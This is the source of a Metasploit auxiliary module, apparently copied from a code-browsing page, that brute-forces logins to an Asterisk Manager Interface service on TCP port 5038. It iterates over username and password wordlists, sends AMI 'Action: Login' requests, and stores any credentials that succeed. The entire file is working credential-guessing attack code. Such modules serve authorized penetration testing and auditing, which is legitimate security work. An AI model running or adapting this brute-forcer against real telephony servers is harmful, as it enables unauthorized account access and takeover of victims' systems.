Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.
Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.
Path: blob/master/modules/auxiliary/voip/asterisk_login.rb
Views: 11623
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Auxiliary6include Msf::Exploit::Remote::Tcp7include Msf::Auxiliary::Scanner8include Msf::Auxiliary::Report9include Msf::Auxiliary::AuthBrute1011def initialize(info={})12super(update_info(info,13'Name' => 'Asterisk Manager Login Utility',14'Description' => %q{15This module attempts to authenticate to an Asterisk Manager service. Please note16that by default, Asterisk Call Management (port 5038) only listens locally, but17this can be manually configured in file /etc/asterisk/manager.conf by the admin18on the victim machine.19},20'Author' =>21[22'dflah_ <dflah[at]alligatorteam.org>',23],24'References' =>25[26['URL', 'http://www.asterisk.org/astdocs/node201.html'], # Docs for AMI27],28'License' => MSF_LICENSE29))3031register_options(32[33Opt::RPORT(5038),34OptString.new('USER_FILE',35[36false,37'The file that contains a list of probable users accounts.',38File.join(Msf::Config.install_root, 'data', 'wordlists', 'unix_users.txt')39]),4041OptString.new('PASS_FILE',42[43false,44'The file that contains a list of probable passwords.',45File.join(Msf::Config.install_root, 'data', 'wordlists', 'unix_passwords.txt')46])47])48end4950def report_cred(opts)51service_data = {52address: opts[:ip],53port: opts[:port],54service_name: 'asterisk_manager',55protocol: 'tcp',56workspace_id: myworkspace_id57}5859credential_data = {60origin_type: :service,61module_fullname: fullname,62username: opts[:user],63private_data: opts[:password],64private_type: :password65}.merge(service_data)6667login_data = {68last_attempted_at: DateTime.now,69core: create_credential(credential_data),70status: Metasploit::Model::Login::Status::SUCCESSFUL,71proof: opts[:proof]72}.merge(service_data)7374create_credential_login(login_data)75end7677def run_host(ip)78print_status("Initializing module...")79begin80each_user_pass do |user, pass|81do_login(user, pass)82end83rescue ::Rex::ConnectionError84rescue ::Exception => e85vprint_error("#{rhost}:#{rport} #{e.to_s} #{e.backtrace}")86end87end8889def send_manager(command='')90begin91@result = ''92if (!@connected)93connect94@connected = true95select(nil,nil,nil,0.4)96end97sock.put(command)98@result = sock.get_once || ''99rescue ::Exception => err100print_error("Error: #{err.to_s}")101end102end103104def do_login(user='',pass='')105@connected = false106begin107send_manager(nil) # connect Only108if @result !~ /^Asterisk Call Manager(.*)/109print_error("Asterisk Manager does not appear to be running")110return :abort111else112vprint_status("#{rhost}:#{rport} - Trying user:'#{user}' with password:'#{pass}'")113cmd = "Action: Login\r\nUsername: #{user}\r\nSecret: #{pass}\r\n\r\n"114send_manager(cmd)115if /Response: Success/.match(@result)116print_good("User: \"#{user}\" using pass: \"#{pass}\" - can login on #{rhost}:#{rport}!")117report_cred(ip: rhost, port: rport, user: user, password: pass, proof: @result)118disconnect119return :next_user120else121disconnect122return :fail123end124end125rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout126rescue ::Timeout::Error, ::Errno::EPIPE127end128end129end130131132